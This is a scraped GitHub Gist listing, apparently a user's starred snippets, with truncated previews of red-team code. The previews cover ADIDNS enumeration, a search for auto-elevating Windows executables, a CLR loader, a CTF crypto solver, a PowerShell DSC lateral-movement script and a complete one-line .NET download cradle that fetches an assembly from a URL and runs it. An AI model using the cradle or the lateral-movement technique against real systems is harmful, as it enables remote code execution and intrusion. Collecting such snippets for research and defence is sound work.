Skip to content

Instantly share code, notes, and snippets.


Franci Šacer fsacer

Block or report user

Report or block fsacer

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
3xocyte /
Last active Nov 12, 2019
get /etc/hosts entries from ADIDNS
#!/usr/bin/env python
import argparse
import sys
import binascii
import socket
import re
from ldap3 import Server, Connection, NTLM, ALL, SUBTREE, ALL_ATTRIBUTES
# get /etc/hosts entries for domain-joined computers from A and AAAA records (via LDAP/ADIDNS) (@3xocyte)

Windows Toolkit


Native Binaries

IDA Plugins Preferred Neutral Unreviewed
View AcoraidaMonicaGame.sol
pragma solidity =0.4.25;
contract AcoraidaMonicaGame{
uint256 public version = 4;
string public description = "Acoraida Monica admires smart guys, she'd like to pay 10000ETH to the one who could answer her question. Would it be you?";
string public constant sampleQuestion = "Who is Acoraida Monica?";
string public constant sampleAnswer = "$*!&#^[` a@.3;Ta&*T` R`<`~5Z`^5V You beat me! :D";
Logger public constant logger=Logger(0x5e351bd4247f0526359fb22078ba725a192872f3);
address questioner;
string public question;
Evilcry / findautoelevate.ps1
Created Jul 8, 2018
Enumerate executables with auto-elevation enabled
View findautoelevate.ps1
# Find Autoelevate executables
Write-Host "System32 Autoelevate Executables" -ForegroundColor Green -BackgroundColor Black
Select-String -Path C:\Windows\System32\*.exe -pattern "<AutoElevate>true"
Write-Host "`nSysWOW64 Autoelevate Executables" -ForegroundColor Green -BackgroundColor Black
Select-String -Path C:\Windows\SysWOW64\*.exe -pattern "<AutoElevate>true"
Neo23x0 /
Last active Mar 10, 2020
Typical False Positive Hashes
# This GIST has been transformed into a Git repository and does not receive updates anymore
# Please visit the github repo to get a current list
# Hashes that are often included in IOC lists but are false positives
# Empty file
cobbr / DotnetAssemblyDownloadCradle.cs
Created Jun 20, 2018
A download cradle for .NET assemblies.
View DotnetAssemblyDownloadCradle.cs
public class Program { public static void Main(string[] args) { System.Reflection.Assembly.Load(new System.Net.WebClient().DownloadData(args[0])).GetTypes()[0].GetMethods()[0].Invoke(0, null); } }
xpn / clr_via_native.c
Created Apr 11, 2018
A quick example showing loading CLR via native code
View clr_via_native.c
#include "stdafx.h"
int main()
ICLRMetaHost *metaHost = NULL;
IEnumUnknown *runtime = NULL;
ICLRRuntimeInfo *runtimeInfo = NULL;
ICLRRuntimeHost *runtimeHost = NULL;
IUnknown *enumRuntime = NULL;
LPWSTR frameworkName = NULL;
LiveOverflow / software_update.sage
Created Mar 16, 2018
34C3 CTF software_update (crypto)
View software_update.sage
import sage.all
import hashlib
# part1 -
# part2 -
# prepare a table of bits
def bits_of(x):
bits = []
for c in "{:08b}".format(x):
View PowerShellHostFinder.ps1
# Author: Matt Graeber, SpecterOps
ls C:\* -Recurse -Include '*.exe', '*.dll' -ErrorAction SilentlyContinue | % {
try {
$Assembly = [Reflection.Assembly]::ReflectionOnlyLoadFrom($_.FullName)
if ($Assembly.GetReferencedAssemblies().Name -contains 'System.Management.Automation') {
} catch {}
View PowerShellDSCLateralMovement.ps1
# This idea originated from this blog post on Invoke DSC Resources directly:
$MOFContents = @'
instance of MSFT_ScriptResource as $MSFT_ScriptResource1ref
ResourceID = "[Script]ScriptExample";
GetScript = "\"$(Get-Date): I am being GET\" | Out-File C:\\Windows\\Temp\\ScriptRun.txt -Append; return $True";
TestScript = "\"$(Get-Date): I am being TESTED\" | Out-File C:\\Windows\\Temp\\ScriptRun.txt -Append; return $True";
You can’t perform that action at this time.